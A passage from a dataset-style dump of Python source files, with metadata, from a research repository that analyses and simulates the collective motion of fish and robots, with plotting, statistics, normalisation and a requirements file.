np.array((velocities.shape[0], 1))\n tup = []\n for i in range(velocities.shape[1] // 2):\n linear_velocity = np.sqrt(\n velocities[:, i * 2] ** 2 + velocities[:, i * 2 + 1] ** 2).tolist()\n tup.append(linear_velocity)\n\n hdgs = np.empty((positions.shape[0], 0))\n for i in range(positions.shape[1] // 2):\n hdg = np.arctan2(velocities[:, i*2+1], velocities[:, i*2])\n hdgs = np.hstack((hdgs, hdg.reshape(-1, 1)))\n\n # for the focal\n angle_dif_focal = hdgs[:, 0] - \\\n np.arctan2(positions[:, 1], positions[:, 0])\n angle_dif_focal = list(map(angle_to_pipi, angle_dif_focal))\n\n # for the neigh\n angle_dif_neigh = hdgs[:, 1] - \\\n np.arctan2(positions[:, 3], positions[:, 2])\n angle_dif_neigh = list(map(angle_to_pipi, angle_dif_neigh))\n\n data[e]['rel_or'].append(\n np.array([angle_dif_focal, angle_dif_neigh]).T)\n\n distance = np.sqrt(\n (positions[:, 0] - positions[:, 2]) ** 2 + (positions[:, 1] - positions[:, 3]) ** 2)\n\n data[e]['rvel'].append(np.array(tup).T)\n data[e]['pos'].append(positions)\n data[e]['vel'].append(velocities)\n data[e]['interindividual_distance'].append(distance)\n\n ###############################################################################\n # Virtual\n ###############################################################################\n _, ax = plt.subplots(figsize=(10, 3),\n nrows=1, ncols=3,\n gridspec_kw={'width_ratios': [\n 1, 1, 1], 'wspace': 0.3, 'hspace': 0.0}\n )\n\n # position\n\n sub_data = data.copy()\n if 'Hybrid' in sub_data.keys():\n del sub_data['Hybrid']\n reset_palette()\n ax[0] = corx(sub_data, ax[0], args)\n ax[0] = annot_axes(ax[0],\n '$t$ (s)', r'$C_X$ $(cm^2)$',\n [0.0, 25.0], [0.0, 1300],\n [5, 2.5], [250, 125],\n 1)\n print('Done with position')\n\n # velocity\n sub_data = data.copy()\n if 'Hybrid' in sub_data.keys():\n del sub_data['Hybrid']\n reset_palette()\n ax[1] = corv(sub_data, ax[1], args)\n ax[1] = annot_axes(ax[1],\n '$t$ (s)', r'$C_V$ $(\\,cm^2 / \\,s^2)$',\n [0.0, 25.0], [-100.0, 200],\n [5, 2.5], [50, 25],\n 1)\n ax[1].yaxis.set_label_coords(-0.18, 0.5)\n print('Done with Velocity')\n\n # relative orientation\n sub_data = data.copy()\n if 'Hybrid' in sub_data.keys():\n del sub_data['Hybrid']\n reset_palette()\n ax[2] = cortheta(sub_data, ax[2], args)\n ax[2] = annot_axes(ax[2],\n '$t$ (s)', r'$C_{\\theta_{\\rm w}}$',\n [0.0, 25.0], [0.0, 1.0],\n [5, 2.5], [0.2, 0.1],\n 1)\n print('Done with theta')\n\n # ax[0].text(-0.2, 1.07, r'$\\mathbf{A}$',\n # fontsize=18, transform=ax[0].transAxes)\n # ax[1].text(-0.2, 1.07, r'$\\mathbf{B}$',\n # fontsize=18, transform=ax[1].transAxes)\n # ax[2].text(-0.2, 1.07, r'$\\mathbf{C}$',\n # fontsize=18, transform=ax[2].transAxes)\n\n ax[0].legend().remove()\n ax[1].legend().remove()\n ax[2].legend().remove()\n\n plt.gcf().subplots_adjust(bottom=0.141, left=0.078, top=0.965, right=0.985)\n plt.savefig(path + 'correlation_quantities_virtual.png')\n\n ###############################################################################\n # Hybrid\n ###############################################################################\n _, ax = plt.subplots(figsize=(10, 3),\n nrows=1, ncols=3,\n gridspec_kw={'width_ratios': [\n 1, 1, 1], 'wspace': 0.3, 'hspace': 0.0}\n )\n\n sub_data = data.copy()\n if 'Virtual' in sub_data.keys():\n del sub_data['Virtual']\n if 'Virtual (Toulouse)' in sub_data.keys():\n del sub_data['Virtual (Toulouse)']\n reset_palette()\n ax[0] = corx(sub_data, ax[0], args)\n ax[0] = annot_axes(ax[0],\n '$t$ (s)', r'$C_X$ $(cm^2)$',\n [0.0, 25.0], [0.0, 1300],\n [5, 2.5], [250, 125],\n 1)\n print('Done with position')\n\n sub_data = data.copy()\n if 'Virtual' in sub_data.keys():\n del sub_data['Virtual']\n if 'Virtual (Toulouse)' in sub_data.keys():\n del sub_data['Virtual (Toulouse)']\n reset_palette()\n ax[1] = corv(sub_data, ax[1], args)\n ax[1] = annot_axes(ax[1],\n '$t$ (s)', r'$C_V$ $(\\,cm^2 / \\,s^2)$',\n [0.0, 25.0], [-100.0, 200],\n [5, 2.5], [50, 25],\n 1)\n ax[1].yaxis.set_label_coords(-0.18, 0.5)\n print('Done with Velocity')\n\n shared._uni_pallete = [\"#e74c3c\", \"#000000\", \"#3498db\"]\n sub_data = data.copy()\n if 'Virtual' in sub_data.keys():\n del sub_data['Virtual']\n if 'Virtual (Toulouse)' in sub_data.keys():\n del sub_data['Virtual (Toulouse)']\n reset_palette()\n ax[2] = cortheta(sub_data, ax[2], args)\n ax[2] = annot_axes(ax[2],\n '$t$ (s)', r'$C_{\\theta_{\\rm w}}$',\n [0.0, 25.0], [0.0, 1.0],\n [5, 2.5], [0.2, 0.1],\n 1)\n print('Done with theta')\n\n # ax[0].text(-0.2, 1.07, r'$\\mathbf{A}$',\n # fontsize=18, transform=ax[0].transAxes)\n # ax[1].text(-0.2, 1.07, r'$\\mathbf{B}$',\n # fontsize=18, transform=ax[1].transAxes)\n # ax[2].text(-0.2, 1.07, r'$\\mathbf{C}$',\n # fontsize=18, transform=ax[2].transAxes)\n\n ax[0].legend().remove()\n ax[1].legend().remove()\n ax[2].legend().remove()\n\n plt.gcf().subplots_adjust(bottom=0.135, left=0.078, top=0.965, right=0.985)\n plt.savefig(path + 'correlation_quantities_hybrid.png')\n\n print('Done with relative orientation to the wall')\n"
},
{
"alpha_fraction": 0.5792682766914368,
"alphanum_fraction": 0.5862369537353516,
"avg_line_length": 30.88888931274414,
"blob_id": "cbef7b5f440052a982e797f1442f23e6f7a96578",
"content_id": "4d0c7d370912e0c198da3086cc2a75b7116f3c7b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1148,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 36,
"path": "/find/simulation/position_stat.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "from find.simulation.simu.stat.stat_base import StatBase\n\nimport numpy as np\nfrom pathlib import Path\n\n\nclass PositionStat(StatBase):\n def __init__(self, dims, filename, dirname='', dump_period=-1):\n super().__init__(filename, dirname, dump_period)\n self._positions = np.empty((0, dims))\n self._dims = dims\n\n def get_filename(self):\n return self._filename\n\n def get(self):\n return self._positions\n\n def save(self):\n np.savetxt(Path(self._dirname).joinpath(\n self._filename), self._positions)\n\n def __call__(self, simu):\n early_dump = self._dump_period > 0 and simu.get_current_iteration() % self._dump_period == 0\n\n if simu.get_num_iterations() == simu.get_current_iteration() + 1 or early_dump:\n appended_pos = np.empty(\n (simu.get_individuals()[0].get_position_history().shape[0], 0))\n\n for ind in simu.get_individuals():\n appended_pos = np.hstack(\n (appended_pos, ind.get_position_history()))\n self._positions = appended_pos\n\n if early_dump:\n self.save()\n"
},
{
"alpha_fraction": 0.5680586695671082,
"alphanum_fraction": 0.5769844055175781,
"avg_line_length": 31.010204315185547,
"blob_id": "209e819189b784192ae7d77446e6c695414193ac",
"content_id": "d11416cb6a5080f99db3cd3f817ca60c2955db34",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3137,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 98,
"path": "/find/plots/nn/training_curves.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nimport os\nimport glob\nimport argparse\nfrom tqdm import tqdm\nfrom copy import deepcopy\n\nfrom find.plots.common import *\nfrom find.plots.nn.training_history import prepare_plot_history\n\n\ndef get_directory_name_at_level(abs_path, depth=0, keep_parents=0):\n path = abs_path\n for _ in range(depth):\n path = os.path.dirname(path)\n\n parents = ''\n if keep_parents > 0:\n parents = [os.path.dirname(path)]\n for _ in range(keep_parents-1):\n parents.append(os.path.dirname(parents[-1]))\n parents = list(map(lambda p: os.path.basename(p) + '/', parents))\n parents = list(reversed(parents))\n parents = ''.join(parents)\n return parents + os.path .basename(path)\n\n\ndef plot(exp_files, path, args):\n test_args = deepcopy(args)\n arg_dict = vars(test_args)\n arg_dict['nn_last_epoch'] = -1\n arg_dict['nn_num_sample_epochs'] = -1\n\n log_files = glob.glob(args.path + '/logs/history.csv')\n test_log_files = glob.glob(args.path + '/test/history.csv')\n # if len(log_files) == 0 or len(test_log_files) == 0:\n # return \n\n plot_dict = prepare_plot_history(log_files, args.path, args)\n # plot_dict_test = prepare_plot_history(test_log_files, args.path, test_args)\n\n # 'epoch,gaussian_mae,gaussian_mse,loss,val_gaussian_mae,val_gaussian_mse,val_loss'\n\n plt.figure(figsize=(10, 6))\n ax = plt.gca()\n lines = ['-', '--', ':']\n linecycler = cycle(lines)\n\n for k in ['loss', 'val_loss']:\n _, x, y = plot_dict[k][0]\n sns.lineplot(x=x, y=y, ax=ax,\n linewidth=uni_linewidth, color='blue', label=k, linestyle=next(linecycler))\n\n # _, _, yt = plot_dict_test['loss'][0]\n # _, _, xt = plot_dict_test['epochs'][0]\n\n # sns.lineplot(x=xt, y=yt, ax=ax,\n # linewidth=uni_linewidth, color='blue', label='test_loss', linestyle=next(linecycler)) \n ax.legend()\n ax.set_xlabel('Epochs')\n ax.set_xlim([0, x[-1]])\n # ax.set_ylim([-3, 3]) # TODO: remove\n plt.savefig(args.path + '/test.png')\n plt.close()\n\n plt.figure(figsize=(10, 6))\n ax = plt.gca()\n lines = ['-', '--']\n linecycler = cycle(lines)\n\n for k in ['gaussian_mse', 'val_gaussian_mse']:\n _, x, y = plot_dict[k][0]\n sns.lineplot(x=x, y=y, ax=ax,\n linewidth=uni_linewidth, color='blue', label=k, linestyle=next(linecycler))\n\n # _, _, yt = plot_dict_test['gaussian_mse'][0]\n # _, _, xt = plot_dict_test['epochs'][0]\n\n # sns.lineplot(x=xt, y=yt, ax=ax,\n # linewidth=uni_linewidth, color='blue', label='test_gaussian_mse', linestyle=next(linecycler)) \n\n ax.legend()\n ax.set_xlabel('Epochs')\n # ax.set_xlim([0, x[-1]])\n plt.savefig(args.path + '/test2.png')\n\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Plot NN metrics from the training history')\n parser.add_argument('--path', '-p',\n type=str,\n help='Path to the experiment',\n required=True)\n args = parser.parse_args()\n\n plot(None, './', args)\n"
},
{
"alpha_fraction": 0.5169230699539185,
"alphanum_fraction": 0.7415384650230408,
"avg_line_length": 22.214284896850586,
"blob_id": "a91f0dd6022937e56f8f012d232756dedc0b8607",
"content_id": "4e981abb701398fca5100a119a963f52ca3e070d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 325,
"license_type": "no_license",
"max_line_length": 124,
"num_lines": 14,
"path": "/find/simulation/simu/requirements.txt",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "astroid==2.4.2\nautopep8==1.5.3\nisort==4.3.21\nlazy-object-proxy==1.4.3\nmccabe==0.6.1\nnumpy==1.19.1\npycodestyle==2.6.0\npylint==2.5.3\n-e [email protected]:bpapaspyros/python-particle-simu.git@bc00436c57eb5d7de99737908494c35cc678f6a4#egg=python_particle_simu\nsix==1.15.0\ntoml==0.10.1\ntqdm==4.48.2\ntyped-ast==1.4.1\nwrapt==1.12.1\n"
},
{
"alpha_fraction": 0.5534883737564087,
"alphanum_fraction": 0.5581395626068115,
"avg_line_length": 30.617647171020508,
"blob_id": "e20a542a5a5fa488898edd665ea74f8f82657bbe",
"content_id": "93ef9e9ef9089908380fb843871b83fed2fec112",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1075,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 34,
"path": "/find/simulation/nn_prediction_stat.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "from find.simulation.simu.stat.stat_base import StatBase\n\nimport numpy as np\nfrom pathlib import Path\n\n\nclass NNPredictionStat(StatBase):\n def __init__(self, nn_functor, dims, filename, dirname=''):\n super().__init__(filename, dirname)\n self._positions = np.empty((0, dims))\n self._dims = dims\n self._nn_functor = nn_functor\n\n def get_filename(self):\n return self._filename\n\n def get(self):\n return self._positions\n\n def save(self):\n np.savetxt(Path(self._dirname).joinpath(\n self._filename), self._positions)\n\n def __call__(self, simu):\n if simu.get_current_iteration() > 1:\n individuals = simu.get_individuals()\n row = np.empty((1, self._dims))\n for ind in individuals:\n if ind.is_robot():\n pos = ind.get_position()\n else:\n pos = self._nn_functor(ind.get_id(), simu)\n row = np.hstack((row, pos.reshape(1, -1)))\n self._positions = np.vstack((self._positions, row))\n"
},
{
"alpha_fraction": 0.5281879305839539,
"alphanum_fraction": 0.5410737991333008,
"avg_line_length": 36.25,
"blob_id": "a00be3966c5872defbe3c8705f16929dd6941e28",
"content_id": "5697c98510776c1f2a4e1744ce3bb0c92d47ae7d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7450,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 200,
"path": "/find/utils/utils.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "import numpy as np\n\n\nclass ExperimentInfo:\n \"\"\"Container class for a single experiment's information. This is useful for aligning all the experiments\n in terms of the setup position, etc.\n \"\"\"\n\n def __init__(self, data):\n \"\"\"\n :param data: np.array of the raw iDTracker data (this includes confidence values for the fish positions)\n \"\"\"\n self._maxXs = [np.max(np.delete(matrix, np.s_[1::2], 1))\n for matrix in data]\n self._minXs = [np.min(np.delete(matrix, np.s_[1::2], 1))\n for matrix in data]\n self._maxYs = [np.max(np.delete(matrix, np.s_[0::2], 1))\n for matrix in data]\n self._minYs = [np.min(np.delete(matrix, np.s_[0::2], 1))\n for matrix in data]\n\n self._init_limits()\n\n def _init_limits(self):\n self._global_minX = np.min(self._minXs)\n self._global_maxX = np.max(self._maxXs)\n self._global_minY = np.min(self._minYs)\n self._global_maxY = np.max(self._maxYs)\n\n def center(self, idx=-1):\n \"\"\"\n :param idx: int, optional index of the individual's trajectories that will be used as reference for determining\n the setup's center. If -1 the center will be computed by looking at all individuals.\n :return: tuple(float, float) of the center coordinates\n \"\"\"\n if idx < 0:\n return ((self._global_maxX + self._global_minX) / 2, (self._global_maxY + self._global_minY) / 2)\n else:\n return ((self._maxXs[idx] + self._minXs[idx]) / 2, (self._maxYs[idx] + self._minYs[idx]) / 2)\n\n def setMinXY(self, vals, idx):\n (self._minXs[idx], self._minYs[idx]) = vals\n self._init_limits()\n\n def setMaxXY(self, vals, idx):\n (self._maxXs[idx], self._maxYs[idx]) = vals\n self._init_limits()\n\n def minXY(self, idx):\n \"\"\"\n :param idx: int index of the individual's trajectories\n :return: tuple(float, float) minimum values for X and Y\n \"\"\"\n return (self._minXs[idx], self._minYs[idx])\n\n def maxXY(self, idx):\n \"\"\"\n :param idx: int index of the individual's trajectories\n :return: tuple(float, float) maximum values for X and Y\n \"\"\"\n return (self._maxXs[idx], self._maxYs[idx])\n\n \"\"\"\n :return: tuple(float, float) global minimum values for X and Y\n \"\"\"\n\n def globalMinXY(self):\n return (self._global_minX, self._global_minY)\n\n \"\"\"\n :return: tuple(float, float) global maximum values for X and Y\n \"\"\"\n\n def globalMaxXY(self):\n return (self._global_maxX, self._global_maxY)\n\n def printInfo(self):\n print('Center: ' + str(self.center()))\n print('min(X, Y): ' + str(self._global_minX) +\n ', ' + str(self._global_minY))\n print('max(X, Y): ' + str(self._global_maxX) +\n ', ' + str(self._global_maxY))\n\n\nclass Center:\n \"\"\"Class responsible for centering the experimental data to (0, 0). This is especially useful in cases were\n the experimental setup might slightly (or even significantly) move from one experiment to the next.\n \"\"\"\n\n def __init__(self, data, info, args={}):\n \"\"\"\n :param data: list(np.array) of matrices with (position) information\n :param info: ExperimentInfo instance for the given\n :param args: dict, optional extra arguments for the function (not applicable)\n \"\"\"\n\n for i, matrix in enumerate(data):\n c = info.center(i)\n for n in range(matrix.shape[1] // 2):\n matrix[:, n * 2] = matrix[:, n * 2] - c[0]\n matrix[:, n * 2 + 1] = matrix[:, n * 2 + 1] - c[1]\n self._data = data\n self._info = ExperimentInfo(data)\n\n def get(self):\n \"\"\"\n :return: tuple(list(np.array), ExperimentInfo) the centered positions and updated experiment information\n \"\"\"\n return self._data, self._info\n\n\nclass Normalize:\n \"\"\"Class responsible for normalizing the experimental data in the range [-1, 1]. Different experiments might have\n slightly different boundaries due to changes in the setup's position. The normalization process allows for\n bringing all experiments in the same range and comparing the behavioural side without numerical issues.\n \"\"\"\n\n def __init__(self, data, info, args={'is_circle': True}):\n \"\"\"\n :param data: list(np.array) of matrices with (position) information\n :param info: ExperimentInfo instance for the given\n :param args: dict, optional extra arguments for the function (not applicable)\n \"\"\"\n\n for i, matrix in enumerate(data):\n xminh = info.minXY(i)[0]\n xmaxh = info.maxXY(i)[0]\n yminh = info.minXY(i)[1]\n ymaxh = info.maxXY(i)[1]\n maxdh = max([xmaxh-xminh, ymaxh-yminh])\n radius = maxdh / 2\n c = info.center(i)\n\n if args['is_circle']:\n for n in range(matrix.shape[1] // 2):\n rads = matrix\n rads[:, n * 2] -= c[0]\n rads[:, n * 2 + 1] -= c[1]\n phis = np.arctan2(rads[:, n * 2 + 1], rads[:, n * 2])\n rads[:, n * 2] = rads[:, n * 2] ** 2\n rads[:, n * 2 + 1] = rads[:, n * 2 + 1] ** 2\n rads = np.sqrt(rads[:, n * 2] + rads[:, n * 2 + 1])\n rads /= radius\n matrix[:, n * 2] = rads * np.cos(phis)\n matrix[:, n * 2 + 1] = rads * np.sin(phis)\n else:\n maxXY = info.maxXY(i)\n for n in range(matrix.shape[1] // 2):\n matrix[:, n * 2] /= maxXY[0]\n matrix[:, n * 2 + 1] /= maxXY[1]\n self._data = data\n self._info = ExperimentInfo(data)\n\n def get(self):\n \"\"\"\n :return: tuple(list(np.array), ExperimentInfo) the centered positions and updated experiment information\n \"\"\"\n return self._data, self._info\n\n\ndef angle_to_pipi(angle):\n \"\"\"\n :param angle: float angle difference between the heading of two individuals\n :return: float smallest difference within the range of -pi and pi\n \"\"\"\n while True:\n if angle < -np.pi:\n angle += 2. * np.pi\n if angle > np.pi:\n angle -= 2. * np.pi\n if (np.abs(angle) <= np.pi):\n break\n return angle\n\n\ndef compute_leadership(positions, velocities):\n ang0 = np.arctan2(positions[:, 1] - positions[:, 3],\n positions[:, 0] - positions[:, 2])\n ang1 = np.arctan2(positions[:, 3] - positions[:, 1],\n positions[:, 2] - positions[:, 0])\n theta = [ang1, ang0]\n\n previous_leader = -1\n leader_changes = -1\n leadership_timeseries = []\n\n for i in range(velocities.shape[0]):\n angles = []\n for j in range(velocities.shape[1] // 2):\n phi = np.arctan2(velocities[i, j * 2 + 1], velocities[i, j * 2])\n psi = angle_to_pipi(phi - theta[j][i])\n angles.append(np.abs(psi))\n\n geo_leader = np.argmax(angles)\n if geo_leader != previous_leader:\n leader_changes += 1\n previous_leader = geo_leader\n leadership_timeseries.append([i, geo_leader])\n\n return (leader_changes, leadership_timeseries)\n"
},
{
"alpha_fraction": 0.4364733397960663,
"alphanum_fraction": 0.4782657325267792,
"avg_line_length": 36.132781982421875,
"blob_id": "fdf0145d92c995b9092dc3de762254175add22b2",
"content_id": "e4acafb94185dae2c13aba784b5f47c6d78a9997",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8949,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 241,
"path": "/find/plots/dl_si_2021/collective_quantities.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nimport glob\nimport argparse\nfrom turtle import position\n\nfrom find.utils.features import Velocities\nfrom find.plots.common import *\nimport find.plots.common as shared\n\nimport find.plots.spatial.interindividual_distance as interd\nimport find.plots.spatial.relative_orientation as relor\n\nfrom matplotlib.ticker import (MultipleLocator, FormatStrFormatter,\n AutoMinorLocator, FuncFormatter)\n\nROBOT_DATA = True\nTRAJNET_DATA = False\nPFW_DATA = False\nDISABLE_TOULOUSE = False\n\n# TRAJNET_DATA = False\n# PFW_DATA = False\n# DISABLE_TOULOUSE = False\n\n# TRAJNET_DATA = False\n# PFW_DATA = True\n# DISABLE_TOULOUSE = False\n\n# TRAJNET_DATA = True\n# PFW_DATA = False\n# DISABLE_TOULOUSE = True\n\n\ndef reset_palette():\n if TRAJNET_DATA:\n shared._uni_pallete = [\"#000000\", \"#ed8b02\", \"#e74c3c\"]\n elif PFW_DATA:\n shared._uni_pallete = [\"#000000\", \"#D980FA\"]\n elif ROBOT_DATA:\n shared._uni_pallete = [\"#000000\", \"#e74c3c\", \"#2596be\"]\n else:\n shared._uni_pallete = [\"#000000\", \"#e74c3c\", \"#3498db\", \"#2ecc71\"]\n\n\ndef annot_axes(ax, xlabel, ylabel, xlim, ylim, xloc, yloc, yscale):\n ax.set_xlabel(xlabel)\n ax.set_xlim(xlim)\n ax.xaxis.set_major_locator(MultipleLocator(xloc[0]))\n ax.xaxis.set_minor_locator(MultipleLocator(xloc[1]))\n ax.tick_params(axis=\"x\", which='both',\n direction=\"in\")\n ax.tick_params(axis=\"x\", which='major', length=4.0, width=0.7)\n ax.tick_params(axis=\"x\", which='minor', length=2.0, width=0.7)\n\n ax.set_ylabel(ylabel)\n ylim = [e / yscale for e in ylim]\n ax.set_ylim(ylim)\n ax.get_yaxis().set_major_formatter(\n FuncFormatter(lambda x, p: '{:.1f}'.format(x * yscale, ',')))\n ax.yaxis.set_major_locator(MultipleLocator(yloc[0] / yscale))\n ax.yaxis.set_minor_locator(MultipleLocator(yloc[1] / yscale))\n ax.tick_params(which='both', bottom=True,\n left=True, right=True, top=True)\n ax.tick_params(axis=\"y\", which='both', direction=\"in\")\n ax.grid(False)\n return ax\n\n\ndef plot(exp_files, path, args):\n data = {}\n for e in sorted(exp_files.keys()):\n pos = glob.glob(args.path + '/' + exp_files[e])\n if len(pos) == 0:\n continue\n data[e] = {}\n data[e]['pos'] = []\n data[e]['vel'] = []\n data[e]['rvel'] = []\n data[e]['interindividual_distance'] = []\n for p in pos:\n if e == 'Virtual (Toulouse)' and not DISABLE_TOULOUSE:\n f = open(p)\n # to allow for loading fortran's doubles\n strarray = f.read().replace(\"D+\", \"E+\").replace(\"D-\", \"E-\")\n f.close()\n num_ind = len(strarray.split('\\n')[0].strip().split(' '))\n positions = np.fromstring(\n strarray, sep='\\n').reshape(-1, num_ind) * args.radius\n elif e == 'Virtual (Toulouse cpp)':\n positions = np.loadtxt(p)[:, 2:] * args.radius\n else:\n positions = np.loadtxt(p) * args.radius\n if e == 'Robot':\n velocities = Velocities([positions], 0.1).get()[0]\n else:\n velocities = Velocities([positions], args.timestep).get()[0]\n linear_velocity = np.array((velocities.shape[0], 1))\n tup = []\n for i in range(velocities.shape[1] // 2):\n linear_velocity = np.sqrt(\n velocities[:, i * 2] ** 2 + velocities[:, i * 2 + 1] ** 2).tolist()\n tup.append(linear_velocity)\n\n distance = np.sqrt(\n (positions[:, 0] - positions[:, 2]) ** 2 + (positions[:, 1] - positions[:, 3]) ** 2)\n\n data[e]['rvel'].append(np.array(tup).T)\n data[e]['pos'].append(positions)\n data[e]['vel'].append(velocities)\n data[e]['interindividual_distance'].append(distance)\n\n ###############################################################################\n # Virtual\n ###############################################################################\n _, ax = plt.subplots(figsize=(10, 3),\n nrows=1, ncols=3,\n gridspec_kw={'width_ratios': [\n 1, 1, 1], 'wspace': 0.3, 'hspace': 0.38}\n )\n\n # distance to wall\n distances = {}\n for k in data.keys():\n distances[k] = data[k]['interindividual_distance']\n sub_data = distances.copy()\n if 'Hybrid' in sub_data.keys():\n del sub_data['Hybrid']\n\n reset_palette()\n ax[0] = interd.interindividual_distance(sub_data, ax[0], args, [0, 35])\n yscale = 100\n ax[0] = annot_axes(ax[0],\n r'$d_{ij}$ (cm)',\n r'PDF $(\\times {})$'.format(yscale),\n [0.0, 25.0], [0.0, 15.0],\n # [0.0, 35.0], [0.0, 15.0],\n [5, 2.5], [3, 1.5],\n yscale)\n\n # relative orientation\n sub_data = data.copy()\n if 'Hybrid' in sub_data.keys():\n del sub_data['Hybrid']\n reset_palette()\n relor.relative_orientation_to_neigh(sub_data, ax[1], args)\n yscale = 1000\n ax[1] = annot_axes(ax[1],\n r'$\\phi_{ij}$ $(^{\\circ})$',\n r'PDF $(\\times {})$'.format(yscale),\n [-180, 180.0], [0.0, 15.0],\n [90, 30], [3, 1.5],\n yscale)\n\n # viewing angle\n sub_data = data.copy()\n if 'Hybrid' in sub_data.keys():\n del sub_data['Hybrid']\n reset_palette()\n relor.viewing_angle(sub_data, ax[2], args)\n yscale = 1000\n ax[2] = annot_axes(ax[2],\n r'$\\psi_{ij}$ $(^{\\circ})$',\n r'PDF $(\\times {})$'.format(yscale),\n [-180, 180.0], [0.0, 14.5],\n [90, 30], [3, 1.5],\n yscale)\n\n # ax[0].text(-0.2, 1.07, r'$\\mathbf{A}$',\n # fontsize=18, transform=ax[0].transAxes)\n # ax[1].text(-0.2, 1.07, r'$\\mathbf{B}$',\n # fontsize=18, transform=ax[1].transAxes)\n # ax[2].text(-0.2, 1.07, r'$\\mathbf{C}$',\n # fontsize=18, transform=ax[2].transAxes)\n\n plt.gcf().subplots_adjust(bottom=0.141, left=0.062, top=0.965, right=0.985)\n plt.savefig(path + 'collective_quantities_virtual.png')\n\n ###############################################################################\n # Hybrid\n ###############################################################################\n _, ax = plt.subplots(figsize=(10, 3),\n nrows=1, ncols=3,\n gridspec_kw={'width_ratios': [\n 1, 1, 1], 'wspace': 0.3, 'hspace': 0.38}\n )\n\n sub_data = distances.copy()\n if 'Virtual' in sub_data.keys():\n del sub_data['Virtual']\n if 'Virtual (Toulouse)' in sub_data.keys():\n del sub_data['Virtual (Toulouse)']\n reset_palette()\n ax[0] = interd.interindividual_distance(sub_data, ax[0], args, [0, 30])\n yscale = 100\n ax[0] = annot_axes(ax[0],\n r'$d_{ij}$ (cm)',\n r'PDF $(\\times {})$'.format(yscale),\n # [0.0, 25.0], [0.0, 15.0],\n [0.0, 35.0], [0.0, 15.0],\n [5, 2.5], [3, 1.5],\n yscale)\n\n sub_data = data.copy()\n if 'Virtual' in sub_data.keys():\n del sub_data['Virtual']\n if 'Virtual (Toulouse)' in sub_data.keys():\n del sub_data['Virtual (Toulouse)']\n reset_palette()\n relor.relative_orientation_to_neigh(sub_data, ax[1], args)\n yscale = 1000\n ax[1] = annot_axes(ax[1],\n r'$\\phi_{ij}$ $(^{\\circ})$',\n r'PDF $(\\times {})$'.format(yscale),\n [-180, 180.0], [0.0, 15.0],\n [90, 30], [3, 1.5],\n yscale)\n\n sub_data = data.copy()\n if 'Virtual' in sub_data.keys():\n del sub_data['Virtual']\n if 'Virtual (Toulouse)' in sub_data.keys():\n del sub_data['Virtual (Toulouse)']\n reset_palette()\n relor.viewing_angle(sub_data, ax[2], args)\n yscale = 1000\n ax[2] = annot_axes(ax[2],\n r'$\\psi_{ij}$ $(^{\\circ})$',\n r'PDF $(\\times {})$'.format(yscale),\n [-180, 180.0], [0.0, 14.5],\n [90, 30], [3, 1.5],\n yscale)\n\n # ax[0].text(-0.2, 1.07, r'$\\mathbf{A}$',\n # fontsize=18, transform=ax[0].transAxes)\n # ax[1].text(-0.2, 1.07, r'$\\mathbf{B}$',\n # fontsize=18, transform=ax[1].transAxes)\n # ax[2].text(-0.2, 1.07, r'$\\mathbf{C}$',\n # fontsize=18, transform=ax[2].transAxes)\n\n plt.gcf().subplots_adjust(bottom=0.141, left=0.062, top=0.965, right=0.985)\n plt.savefig(path + 'collective_quantities_hybrid.png')\n"
},
{
"alpha_fraction": 0.7828418016433716,
"alphanum_fraction": 0.7828418016433716,
"avg_line_length": 33.96875,
"blob_id": "b79bdb948ccd162d03eac6631760aee9d6e2d65c",
"content_id": "ce3227304b1627da7acf1804e1526445d22ecad5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1119,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 32,
"path": "/find/plots/spatial/__init__.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "from find.plots.spatial import angular_velocity\nfrom find.plots.spatial import distance_to_wall\nfrom find.plots.spatial import grid_occupancy\nfrom find.plots.spatial import interindividual_distance\nfrom find.plots.spatial import relative_orientation\nfrom find.plots.spatial import resultant_acceleration\nfrom find.plots.spatial import resultant_velocity\nfrom find.plots.spatial import future_trajectory_variance\nfrom find.plots.spatial import grid_distribution_comparison\n\nplot_dict = {\n 'angular_velocity': angular_velocity.plot,\n 'distance_to_wall': distance_to_wall.plot,\n 'grid_occupancy': grid_occupancy.plot,\n 'interindividual_distance': interindividual_distance.plot,\n 'relative_orientation': relative_orientation.plot,\n 'resultant_acceleration': resultant_acceleration.plot,\n 'resultant_velocity': resultant_velocity.plot,\n 'future_trajectory_variance': future_trajectory_variance.plot,\n 'grid_distribution_comparison': grid_distribution_comparison.plot,\n}\n\n\nsource = 'spatial'\n\n\ndef available_plots():\n return list(plot_dict.keys())\n\n\ndef get_plot(key):\n return plot_dict[key]\n"
},
{
"alpha_fraction": 0.5661590695381165,
"alphanum_fraction": 0.5719119906425476,
"avg_line_length": 36.88461685180664,
"blob_id": "99d9ccf48ca09fff818acd5e88cc229488f5589b",
"content_id": "d4170b65beaacf2fd19cc6e16363053b50ed0c13",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2955,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 78,
"path": "/find/smoothing/exp_smooth.py",
"repo_name": "epfl-mobots/find",
